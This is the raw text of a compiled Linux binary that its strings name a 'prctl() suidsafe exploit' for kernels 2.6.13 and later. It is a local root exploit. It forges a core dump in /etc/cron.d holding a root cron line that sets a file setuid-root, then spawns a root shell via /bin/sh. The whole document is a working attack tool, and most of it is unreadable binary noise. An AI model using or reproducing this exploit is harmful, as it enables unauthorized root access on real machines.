ELF44 (444H H H HHl\ \\((( Qtd/lib/ld-linux.so.2GNU     Y?LC?<R&bEelFK|9qm89=6;Hw= e. _Jv_RegisterClasses__gmon_start__libc.so.6geteuidsnprintfgetpidprctlexeclperrorreadlinksetrlimitputssleepkillchdirsetgidsignalforkgettimeofdayexit_IO_stdin_used__libc_start_mainsetuidGLIBC_2.2GLIBC_2.0$ii ii $48<@DHLPT X \ ` d hlptx|U5,%0%4h%8h%<h%@h%Dh %Hh(%Lh0%Ph8p%Th@`%XhHP%\hP@%`hX0%dh` %hhh%lhp%phx%th%xh%|h%h%h1^PTRhhQVhOUSQ[tX[U=tvҡuÉUXtt hXЃÐUjhhU)ua hL; j jjhchct hkEy hxhhh@u h[ hċhj Yu h$E hXhj& hVu hEjju, h) h4Ed hV]Phthhhhhh EE=v hwE h[E}u hE}u jxN j hȌj uu hތEejh$u+E<Й}<)ЃPh jx hxEEÐUWVS [r )Eu [^_1G;}r [^_ÐUÐUSRHtHЋCuX[ÐUSP[X[[+] getting root shell/bin/sh[-] execle prctl() suidsafe exploit (C) Julien TINNES /proc/self/exe[-] readlinkThis is not fatal, rewrite the exploit[-] signal[+] Installed signal handler/etc/cron.d[-] chdir[-] prtctlIs you kernel version >= 2.6.13 ?[+] We are suidsafe dumpable!/etc/cron.d/core [-] cronstring is too small[+] Malicious string forged[-] fork[+] Segfaulting child[-] kill[+] Waiting for exploit to succeed (~%ld seconds) [-] It looks like the exploit failed$ h (Ht (oooX\ƅօ&6FVfvƆֆT#/etc/cron.d/core suid_dumpable exploit SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin #%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d GCC: (GNU) 4.0.0 20050525 (Red Hat 4.0.0-9)GCC: (GNU) 4.0.0 20050525 (Red Hat 4.0.0-9)GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)GCC: (GNU) 4.0.0 20050525 (Red Hat 4.0.0-9).symtab.strtab.shstrtab.interp.note.ABI-tag.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame.ctors.dtors.jcr.dynamic.got.got.plt.data.bss.comment#(( 1HH7 ?ttGoXX0To0c l  uhhp`{H(( DD DD HH PP XX \\ $$((` @ , (HtX h   ( DDHPX\$( H*P8XET[( q\ }LTDX ?C<\D)&9K NEcHt eh K 9mH0O @L QnH 9( =H;(H'H6=FS gH}e call_gmon_startcrtstuff.c__CTOR_LIST____DTOR_LIST____JCR_LIST__completed.4583p.4582__do_global_dtors_auxframe_dummy__CTOR_END____DTOR_END____FRAME_END____JCR_END____do_global_ctors_auxprctl2.creadlink@@GLIBC_2.0execl@@GLIBC_2.0getpid@@GLIBC_2.0_DYNAMIC_fp_hwperror@@GLIBC_2.0fork@@GLIBC_2.0signal@@GLIBC_2.0shsetrlimit@@GLIBC_2.2__fini_array_end__dso_handle__libc_csu_finisetgid@@GLIBC_2.0crontemplatefnameputs@@GLIBC_2.0_initprctl@@GLIBC_2.0myrlimitte_startchdir@@GLIBC_2.0sleep@@GLIBC_2.0cronstring__fini_array_start__libc_csu_init__bss_startmain__libc_start_main@@GLIBC_2.0__init_array_enddata_startprintf@@GLIBC_2.0_finigettimeofday@@GLIBC_2.0__preinit_array_endsnprintf@@GLIBC_2.0exit@@GLIBC_2.0_edata_GLOBAL_OFFSET_TABLE__end__init_array_start_IO_stdin_usedkill@@GLIBC_2.0__data_start_Jv_RegisterClasses__preinit_array_startsetuid@@GLIBC_2.0geteuid@@GLIBC_2.0__gmon_start__